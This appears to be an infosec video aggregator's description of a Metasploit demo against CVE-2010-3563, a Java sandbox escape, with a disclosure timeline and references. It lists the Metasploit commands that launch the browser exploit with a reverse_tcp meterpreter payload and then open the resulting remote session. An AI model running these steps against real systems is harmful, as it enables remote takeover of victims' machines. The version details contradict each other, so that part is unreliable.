Description: Timeline :
Vulnerability reported to vendor by ZDI the 2010-04-05
Coordinated public release of advisory the 2010-10-12
Metasploit exploit released the 2010-11-19
Provided by:
Matthias Kaiser
egypt
References :
CVE-2010-3563
ZDI-10-202
Affected versions :
Java Standard Edition equal or above 6 update 21
Tested on Windows 7 Integral with :
Java Standard Edition 6 update 20
Description:
This module exploits a vulnerability in Java Runtime Environment that allows an attacker to escape the Java Sandbox. By injecting a parameter into a javaws call within the BasicServiceImpl class the default java sandbox policy file can be therefore overwritten. The vulnerability affects version 6 prior to update 22.
Metasploit demo :
use exploit/windows/browser/java_basicservice_impl
set SRVHOST 192.168.178.21
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sessions -i 1
sysinfo
getuid
Tags: metasploit , java , jse , jre , exploit , 0day , hack ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.